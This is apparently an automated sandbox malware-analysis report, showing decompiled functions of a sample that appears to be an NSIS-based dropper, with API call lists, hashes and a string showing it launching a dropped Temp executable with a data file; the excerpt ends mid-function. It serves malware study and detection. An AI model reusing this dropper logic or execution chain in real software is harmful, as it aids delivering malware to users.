                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID:
                    • API String ID: 1375471231-0
                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040620A(void* _a4, void* _a8, long _a12) {
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12;
                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                    				if(_t7 == 0 || _t11 != _a12) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}






                    APIs
                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040E579,0040CEF0,00403579,0040CEF0,0040E579,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004061DB(void* _a4, void* _a8, long _a12) {
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12;
                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                    				if(_t7 == 0 || _t11 != _a12) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}






                    APIs
                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004035F8(long _a4) {
                    				long _t2;
                    
                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                    				return _t2;
                    			}





                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00401FA4() {
                    				void* _t9;
                    				char _t13;
                    				void* _t15;
                    				void* _t17;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t19 = E00402DA6(_t15);
                    				E004056CA(0xffffffeb, _t7);
                    				_t9 = E00405C4B(_t19); // executed
                    				_t20 = _t9;
                    				if(_t20 == _t15) {
                    					 *((intOrPtr*)(_t22 - 4)) = 1;
                    				} else {
                    					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                    						_t13 = E00406AE0(_t17, _t20); // executed
                    						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                    							if(_t13 != _t15) {
                    								 *((intOrPtr*)(_t22 - 4)) = 1;
                    							}
                    						} else {
                    							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                    						}
                    					}
                    					_push(_t20);
                    					CloseHandle();
                    				}
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                    				return 0;
                    			}










                    APIs
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                      • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                      • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                      • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                      • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                    • String ID:
                    • API String ID: 2972824698-0
                    • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                    • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                    • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                    • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                    				struct HWND__* _v8;
                    				long _v12;
                    				struct tagRECT _v28;
                    				void* _v36;
                    				signed int _v40;
                    				int _v44;
                    				int _v48;
                    				signed int _v52;
                    				int _v56;
                    				void* _v60;
                    				void* _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct HWND__* _t94;
                    				long _t95;
                    				int _t100;
                    				void* _t108;
                    				intOrPtr _t130;
                    				struct HWND__* _t134;
                    				int _t156;
                    				int _t159;
                    				struct HMENU__* _t164;
                    				struct HWND__* _t168;
                    				struct HWND__* _t169;
                    				int _t171;
                    				void* _t172;
                    				short* _t173;
                    				short* _t175;
                    				int _t177;
                    
                    				_t169 =  *0x429244;
                    				_t156 = 0;
                    				_v8 = _t169;
                    				if(_a8 != 0x110) {
                    					if(_a8 == 0x405) {
                    						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                    					}
                    					if(_a8 != 0x111) {
                    						L17:
                    						_t171 = 1;
                    						if(_a8 != 0x404) {
                    							L25:
                    							if(_a8 != 0x7b) {
                    								goto L20;
                    							}
                    							_t94 = _v8;
                    							if(_a12 != _t94) {
                    								goto L20;
                    							}
                    							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                    							_a8 = _t95;
                    							if(_t95 <= _t156) {
                    								L36:
                    								return 0;
                    							}
                    							_t164 = CreatePopupMenu();
                    							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                    							_t100 = _a16;
                    							_t159 = _a16 >> 0x10;
                    							if(_a16 == 0xffffffff) {
                    								GetWindowRect(_v8,  &_v28);
                    								_t100 = _v28.left;
                    								_t159 = _v28.top;
                    							}
                    							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                    								_v60 = _t156;
                    								_v48 = 0x423748;
                    								_v44 = 0x1000;
                    								_a4 = _a8;
                    								do {
                    									_a4 = _a4 - 1;
                    									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                    								} while (_a4 != _t156);
                    								OpenClipboard(_t156);
                    								EmptyClipboard();
                    								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                    								_a4 = _t108;
                    								_t172 = GlobalLock(_t108);
                    								do {
                    									_v48 = _t172;
                    									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                    									 *_t173 = 0xd;
                    									_t175 = _t173 + 2;
                    									 *_t175 = 0xa;
                    									_t172 = _t175 + 2;
                    									_t156 = _t156 + 1;
                    								} while (_t156 < _a8);
                    								GlobalUnlock(_a4);
                    								SetClipboardData(0xd, _a4);
                    								CloseClipboard();
                    							}
                    							goto L36;
                    						}
                    						if( *0x42922c == _t156) {
                    							ShowWindow( *0x42a268, 8);
                    							if( *0x42a2ec == _t156) {
                    								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                    							}
                    							E0040459D(_t171);
                    							goto L25;
                    						}
                    						 *0x421f18 = 2;
                    						E0040459D(0x78);
                    						goto L20;
                    					} else {
                    						if(_a12 != 0x403) {
                    							L20:
                    							return E0040462B(_a8, _a12, _a16);
                    						}
                    						ShowWindow( *0x429230, _t156);
                    						ShowWindow(_t169, 8);
                    						E004045F9(_t169);
                    						goto L17;
                    					}
                    				}
                    				_v52 = _v52 | 0xffffffff;
                    				_v40 = _v40 | 0xffffffff;
                    				_t177 = 2;
                    				_v60 = _t177;
                    				_v56 = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				_t130 =  *0x42a270;
                    				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                    				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                    				 *0x429230 = GetDlgItem(_a4, 0x403);
                    				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                    				_t134 = GetDlgItem(_a4, 0x3f8);
                    				 *0x429244 = _t134;
                    				_v8 = _t134;
                    				E004045F9( *0x429230);
                    				 *0x429234 = E00404F52(4);
                    				 *0x42924c = 0;
                    				GetClientRect(_v8,  &_v28);
                    				_v52 = _v28.right - GetSystemMetrics(_t177);
                    				SendMessageW(_v8, 0x1061, 0,  &_v60);
                    				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                    				if(_a8 >= 0) {
                    					SendMessageW(_v8, 0x1001, 0, _a8);
                    					SendMessageW(_v8, 0x1026, 0, _a8);
                    				}
                    				if(_a12 >= _t156) {
                    					SendMessageW(_v8, 0x1024, _t156, _a12);
                    				}
                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                    				_push(0x1b);
                    				E004045C4(_a4);
                    				if(( *0x42a278 & 0x00000003) != 0) {
                    					ShowWindow( *0x429230, _t156);
                    					if(( *0x42a278 & 0x00000002) != 0) {
                    						 *0x429230 = _t156;
                    					} else {
                    						ShowWindow(_v8, 8);
                    					}
                    					E004045F9( *0x429228);
                    				}
                    				_t168 = GetDlgItem(_a4, 0x3ec);
                    				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                    				if(( *0x42a278 & 0x00000004) != 0) {
                    					SendMessageW(_t168, 0x409, _t156, _a12);
                    					SendMessageW(_t168, 0x2001, _t156, _a8);
                    				}
                    				goto L36;
                    			}


































                    APIs
                    • GetDlgItem.USER32 ref: 00405867
                    • GetDlgItem.USER32 ref: 00405876
                    • GetClientRect.USER32 ref: 004058B3
                    • GetSystemMetrics.USER32 ref: 004058BA
                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                    • ShowWindow.USER32(?,00000008), ref: 00405956
                    • GetDlgItem.USER32 ref: 00405977
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                    • GetDlgItem.USER32 ref: 00405885
                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                    • GetDlgItem.USER32 ref: 004059C9
                    • CreateThread.KERNEL32 ref: 004059D7
                    • CloseHandle.KERNEL32(00000000), ref: 004059DE
                    • ShowWindow.USER32(00000000), ref: 00405A02
                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                    • ShowWindow.USER32(00000008), ref: 00405A51
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                    • CreatePopupMenu.USER32 ref: 00405A96
                    • AppendMenuW.USER32 ref: 00405AAA
                    • GetWindowRect.USER32 ref: 00405ACA
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                    • EmptyClipboard.USER32 ref: 00405B31
                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                    • GlobalLock.KERNEL32 ref: 00405B47
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                    • SetClipboardData.USER32 ref: 00405B86
                    • CloseClipboard.USER32 ref: 00405B8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: H7B${
                    • API String ID: 590372296-2256286769
                    • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                    • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed int _v12;
                    				long _v16;
                    				long _v20;
                    				long _v24;
                    				char _v28;
                    				intOrPtr _v32;
                    				long _v36;
                    				char _v40;
                    				unsigned int _v44;
                    				signed int _v48;
                    				WCHAR* _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				intOrPtr _v68;
                    				WCHAR* _v72;
                    				void _v76;
                    				struct HWND__* _v80;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t82;
                    				long _t87;
                    				short* _t89;
                    				void* _t95;
                    				signed int _t96;
                    				int _t109;
                    				signed short _t114;
                    				signed int _t118;
                    				struct HWND__** _t122;
                    				intOrPtr* _t138;
                    				WCHAR* _t146;
                    				unsigned int _t150;
                    				signed int _t152;
                    				unsigned int _t156;
                    				signed int _t158;
                    				signed int* _t159;
                    				signed int* _t160;
                    				struct HWND__* _t166;
                    				struct HWND__* _t167;
                    				int _t169;
                    				unsigned int _t197;
                    
                    				_t156 = __edx;
                    				_t82 =  *0x422720;
                    				_v32 = _t82;
                    				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                    				if(_a8 == 0x40b) {
                    					E00405CAC(0x3fb, _t146);
                    					E004068EF(_t146);
                    				}
                    				_t167 = _a4;
                    				if(_a8 != 0x110) {
                    					L8:
                    					if(_a8 != 0x111) {
                    						L20:
                    						if(_a8 == 0x40f) {
                    							L22:
                    							_v8 = _v8 & 0x00000000;
                    							_v12 = _v12 & 0x00000000;
                    							E00405CAC(0x3fb, _t146);
                    							if(E0040603F(_t186, _t146) == 0) {
                    								_v8 = 1;
                    							}
                    							E00406668(0x421718, _t146);
                    							_t87 = E00406A35(1);
                    							_v16 = _t87;
                    							if(_t87 == 0) {
                    								L30:
                    								E00406668(0x421718, _t146);
                    								_t89 = E00405FE2(0x421718);
                    								_t158 = 0;
                    								if(_t89 != 0) {
                    									 *_t89 = 0;
                    								}
                    								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                    									goto L35;
                    								} else {
                    									_t169 = 0x400;
                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                    									asm("cdq");
                    									_v48 = _t109;
                    									_v44 = _t156;
                    									_v12 = 1;
                    									goto L36;
                    								}
                    							} else {
                    								_t159 = 0;
                    								if(0 == 0x421718) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                    									if(_t114 != 0) {
                    										break;
                    									}
                    									if(_t159 != 0) {
                    										 *_t159 =  *_t159 & _t114;
                    									}
                    									_t160 = E00405F83(0x421718);
                    									 *_t160 =  *_t160 & 0x00000000;
                    									_t159 = _t160;
                    									 *_t159 = 0x5c;
                    									if(_t159 != 0x421718) {
                    										continue;
                    									} else {
                    										goto L30;
                    									}
                    								}
                    								_t150 = _v44;
                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                    								_v44 = _t150 >> 0xa;
                    								_v12 = 1;
                    								_t158 = 0;
                    								__eflags = 0;
                    								L35:
                    								_t169 = 0x400;
                    								L36:
                    								_t95 = E00404F52(5);
                    								if(_v12 != _t158) {
                    									_t197 = _v44;
                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                    										_v8 = 2;
                    									}
                    								}
                    								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                    									E00404F3A(0x3ff, 0xfffffffb, _t95);
                    									if(_v12 == _t158) {
                    										SetDlgItemTextW(_a4, _t169, 0x421708);
                    									} else {
                    										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                    									}
                    								}
                    								_t96 = _v8;
                    								 *0x42a304 = _t96;
                    								if(_t96 == _t158) {
                    									_v8 = E0040140B(7);
                    								}
                    								if(( *(_v32 + 0x14) & _t169) != 0) {
                    									_v8 = _t158;
                    								}
                    								E004045E6(0 | _v8 == _t158);
                    								if(_v8 == _t158 &&  *0x423738 == _t158) {
                    									E00404A0E();
                    								}
                    								 *0x423738 = _t158;
                    								goto L53;
                    							}
                    						}
                    						_t186 = _a8 - 0x405;
                    						if(_a8 != 0x405) {
                    							goto L53;
                    						}
                    						goto L22;
                    					}
                    					_t118 = _a12 & 0x0000ffff;
                    					if(_t118 != 0x3fb) {
                    						L12:
                    						if(_t118 == 0x3e9) {
                    							_t152 = 7;
                    							memset( &_v76, 0, _t152 << 2);
                    							_v80 = _t167;
                    							_v72 = 0x423748;
                    							_v60 = E00404E0B;
                    							_v56 = _t146;
                    							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                    							_t122 =  &_v80;
                    							_v64 = 0x41;
                    							__imp__SHBrowseForFolderW(_t122);
                    							if(_t122 == 0) {
                    								_a8 = 0x40f;
                    							} else {
                    								__imp__CoTaskMemFree(_t122);
                    								E00405F37(_t146);
                    								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                    								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == 0x435800) {
                    									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                    									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                    										lstrcatW(_t146, 0x428200);
                    									}
                    								}
                    								 *0x423738 =  *0x423738 + 1;
                    								SetDlgItemTextW(_t167, 0x3fb, _t146);
                    							}
                    						}
                    						goto L20;
                    					}
                    					if(_a12 >> 0x10 != 0x300) {
                    						goto L53;
                    					}
                    					_a8 = 0x40f;
                    					goto L12;
                    				} else {
                    					_t166 = GetDlgItem(_t167, 0x3fb);
                    					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                    						E00405F37(_t146);
                    					}
                    					 *0x429238 = _t167;
                    					SetWindowTextW(_t166, _t146);
                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                    					_push(1);
                    					E004045C4(_t167);
                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                    					_push(0x14);
                    					E004045C4(_t167);
                    					E004045F9(_t166);
                    					_t138 = E00406A35(8);
                    					if(_t138 == 0) {
                    						L53:
                    						return E0040462B(_a8, _a12, _a16);
                    					} else {
                    						 *_t138(_t166, 1);
                    						goto L8;
                    					}
                    				}
                    			}

                    APIs
                    • GetDlgItem.USER32 ref: 00404B04
                    • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                    • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo,00423748,00000000,?,?), ref: 00404C1C
                    • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo), ref: 00404C28
                    • SetDlgItemTextW.USER32 ref: 00404C3A
                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                      • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                      • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                      • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$A$H7B
                    • API String ID: 2624150263-395256101
                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E004021AA() {
                    				signed int _t52;
                    				void* _t56;
                    				intOrPtr* _t60;
                    				intOrPtr _t61;
                    				intOrPtr* _t62;
                    				intOrPtr* _t64;
                    				intOrPtr* _t66;
                    				intOrPtr* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t72;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr* _t78;
                    				intOrPtr* _t80;
                    				void* _t83;
                    				intOrPtr* _t91;
                    				signed int _t101;
                    				signed int _t105;
                    				void* _t107;
                    
                    				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                    				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                    				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                    				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                    				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                    				_t52 =  *(_t107 - 0x20);
                    				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                    				_t101 = _t52 & 0x00008000;
                    				_t105 = _t52 >> 0x0000000c & 0x00000007;
                    				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                    				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                    					E00402DA6(0x21);
                    				}
                    				_t56 = _t107 + 8;
                    				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                    				if(_t56 < _t83) {
                    					L14:
                    					 *((intOrPtr*)(_t107 - 4)) = 1;
                    					_push(0xfffffff0);
                    				} else {
                    					_t60 =  *((intOrPtr*)(_t107 + 8));
                    					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                    					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                    					if(_t61 >= _t83) {
                    						_t64 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                    						if(_t101 == _t83) {
                    							_t80 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
                    						}
                    						if(_t105 != _t83) {
                    							_t78 =  *((intOrPtr*)(_t107 + 8));
